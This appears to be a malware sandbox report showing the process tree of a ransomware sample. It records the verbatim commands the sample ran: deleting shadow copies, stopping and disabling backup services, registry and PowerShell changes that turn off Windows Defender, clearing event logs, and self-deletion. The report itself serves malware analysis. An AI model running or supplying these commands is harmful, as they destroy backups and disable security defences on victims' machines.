1160 net.exe net1.exe PID 1160 wrote to memory of 864 1160 net.exe net1.exe PID 1160 wrote to memory of 864 1160 net.exe net1.exe PID 2440 wrote to memory of 412 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 412 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 412 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 412 wrote to memory of 2496 412 net.exe net1.exe PID 412 wrote to memory of 2496 412 net.exe net1.exe PID 412 wrote to memory of 2496 412 net.exe net1.exe PID 2440 wrote to memory of 2868 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 2868 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 2868 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2868 wrote to memory of 3828 2868 net.exe net1.exe PID 2868 wrote to memory of 3828 2868 net.exe net1.exe PID 2868 wrote to memory of 3828 2868 net.exe net1.exe PID 2440 wrote to memory of 3424 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 3424 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 3424 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 3424 wrote to memory of 1016 3424 net.exe net1.exe PID 3424 wrote to memory of 1016 3424 net.exe net1.exe PID 3424 wrote to memory of 1016 3424 net.exe net1.exe PID 2440 wrote to memory of 3648 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 3648 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 3648 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 3648 wrote to memory of 584 3648 net.exe net1.exe PID 3648 wrote to memory of 584 3648 net.exe net1.exe PID 3648 wrote to memory of 584 3648 net.exe net1.exe PID 2440 wrote to memory of 2812 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 2812 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 2812 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2812 wrote to memory of 1612 2812 net.exe net1.exe PID 2812 wrote to memory of 1612 2812 net.exe net1.exe PID 2812 wrote to memory of 1612 2812 net.exe net1.exe PID 2440 wrote to memory of 1452 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 1452 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 1452 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 1452 wrote to memory of 2788 1452 net.exe net1.exe PID 1452 wrote to memory of 2788 1452 net.exe net1.exe PID 1452 wrote to memory of 2788 1452 net.exe net1.exe PID 2440 wrote to memory of 600 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 600 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 2440 wrote to memory of 600 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe net.exe PID 600 wrote to memory of 1212 600 net.exe net1.exe PID 600 wrote to memory of 1212 600 net.exe net1.exe PID 600 wrote to memory of 1212 600 net.exe net1.exe PID 2440 wrote to memory of 2660 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 2660 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 2660 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 3796 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 3796 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 3796 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 988 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 988 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 988 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe PID 2440 wrote to memory of 1280 2440 ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe"C:\Users\Admin\AppData\Local\Temp\ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3924
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:864
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2496
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:3828
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:1016
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:584
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1612
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2788
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_132f0" /y2⤵
- Suspicious use of WriteProcessMemory
PID:600 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_132f0" /y3⤵PID:1212
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵PID:2660
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:3796
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:988
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1280
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:1248
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵PID:1524
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵PID:384
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵PID:3032
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_132f0" start= disabled2⤵PID:2300
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3316
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3500
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2960
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1236
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2700
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3232
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2288
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1696
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3928
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:348
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:692
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:640
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:420
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1648
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3284
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1016
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:2804
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3944
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2600
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1108
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:588
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:4008
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:920
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1624
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1532 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1796 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2172 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4016
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2900
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1428
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2092
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1856 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3216
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2196 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3924 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:916 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1264 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1468
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2788 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1284
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3264 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:3960
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1652 -
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\rtZ9_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2256 -
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\ec9ef903c4d23e4f10117a2c24d87d6d4bc47dc056db0d0b9178bf4e4ed30cef.exe"2⤵PID:4040
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:1044
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
1c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5
dc1bf0a0bd5fd62025f6b9ace09d6b05
SHA16eaf6c618e4f94bd11736551b61d13f06c614a73
SHA256c7dc69716b4b2ab956bd0d5f53392edbcc7bbba521dbeb581cf2602de6f10106
SHA512758fbedd24970185a0d0aa5e93a1c0299251c01e4942917f15850f4092f5bbc478ff23934466dcc4b6b11d548c77f46810cbcaadf538f291cf3366eebc8e26fc